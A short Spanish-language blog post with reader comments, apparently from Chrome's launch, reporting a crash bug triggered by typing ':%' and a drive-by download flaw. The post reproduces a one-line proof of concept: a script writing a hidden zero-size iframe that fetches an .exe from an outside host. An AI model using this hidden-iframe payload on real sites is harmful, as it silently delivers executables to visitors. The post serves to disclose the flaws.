El nuevo cliente web diseñado por Google lanzado el dia martes “Chrome“, Es vulnerable primero ante un error de cabeceras indefinidas dentro de un archivo dll llamado “Chrome.dll”, el error se observa claramente al tipear :% mostrando un mensaje: “Whoa! Google Chrome has crashed. Restart now?“.
credito original: http://evilfingers.com/advisory/google_chrome_poc.php
Y otro error, Chrome permite descargar archivos ejecutables automaticamente sin ser comprobados por el usuario, este POC se basa en un sencilla etiqueta iframe.
<script> document.write(‘<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’); </script>fuente: www.securiteam.com
4 Comentarios
Jajaja no aguanté la curiosidad y he tipeado “:%” en el Chrome. ¡Chan!
Asi es ese caracter puede ser aprovechada en los links
saludos
Hay otro error gigante bajo mi concepto, el chrome no soporta java, y con lo que me gusta el ajedrez on line. xD
Bueno por hoy van como cinco Poc de Chrome
No duro ni un dia en mi escritorio este explorador